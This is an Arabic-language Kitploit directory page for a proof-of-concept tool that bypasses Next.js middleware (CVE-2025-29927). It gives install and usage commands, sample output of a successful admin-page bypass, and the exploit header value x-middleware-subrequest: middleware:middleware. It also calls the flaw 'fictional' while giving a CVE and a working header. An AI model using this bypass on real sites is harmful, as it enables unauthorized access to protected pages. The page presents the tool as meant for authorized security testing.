Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-for-Next.js-Middleware — > 🔓 إثبات المفهوم لثغرة تجاوز وسيطة Next.js خيالية (CVE-2025-29927) — صياغة طلبات فرعية لاختبار المسارات المحمية. | Kitploit
أدوات/GitHubGitHub/m2hcz/poc-for-next.js-middleware
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubm2hcz/poc-for-next.js-middleware

PoC-for-Next.js-Middleware

> 🔓 إثبات المفهوم لثغرة تجاوز وسيطة Next.js خيالية (CVE-2025-29927) — صياغة طلبات فرعية لاختبار المسارات المحمية.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
1منذ سنة واحدةلم تتم المراجعة بعد

إثبات المفهوم لتجاوز الوسيطة في Next.js (CVE-2025-29927)

Python Version Status

هذا إثبات مفهوم لثغرة افتراضية في تجاوز الوسيطة في Next.js (CVE-2025-29927). يُستخدم فقط للأغراض التعليمية والبحث الأمني المصرح به.


🚀 الميزات

الميزةالوصف
✨ الألوان والإسهابمخرجات ملونة؛ -v لسجلات تصحيح مفصلة.
📦 هيكل البرمجة الكائنيةتصميم قائم على الفئات للوضوح وسهولة الصيانة.
🌐 دعم البروكسيتوجيه حركة المرور عبر بروكسيات HTTP(S) باستخدام --proxy.
🍪 التعامل مع الجلساتجلسة requests.Session دائمة لإعادة استخدام الكوكيز والاتصالات.
🚦 التحكم في إعادة التوجيهعدم متابعة إعادة التوجيه افتراضيًا؛ يكتشف بوضوح النجاح مقابل الفشل.
🛠 رؤوس مخصصةتجاوز User-Agent أو x-middleware-subrequest أو إضافة رؤوس.

⚡ التثبيت

root@kitploit:~
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt

يتطلب Python 3.7+


🎯 الاستخدام

root@kitploit:~
python poc.py [options] <host>[:port]

🔍 أمثلة

1. اختبار أساسي

root@kitploit:~
python poc.py localhost:3000

2. HTTPS ومسار مخصص

root@kitploit:~
python poc.py example.com -s https -p /dashboard

3. بروكسي وإسهاب

root@kitploit:~
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v

✅ المخرجات المتوقعة

نجاح

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…

فشل

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)
تنزيل الأداة
الخيارالوصف
-p, --path PATHمسار المسار المحمي (الافتراضي: /admin)
-s, --scheme {http,https}البروتوكول (الافتراضي: http)
--header HEADERقيمة رأس x-middleware-subrequest (الافتراضي: middleware:middleware)
-ua, --user-agent AGENTUser-Agent مخصص (الافتراضي: Mozilla/5.0)
--proxy PROXYرابط بروكسي HTTP(S) (مثل: http://127.0.0.1:8080)
-v, --verboseتمكين مخرجات التصحيح
-h, --helpعرض رسالة المساعدة هذه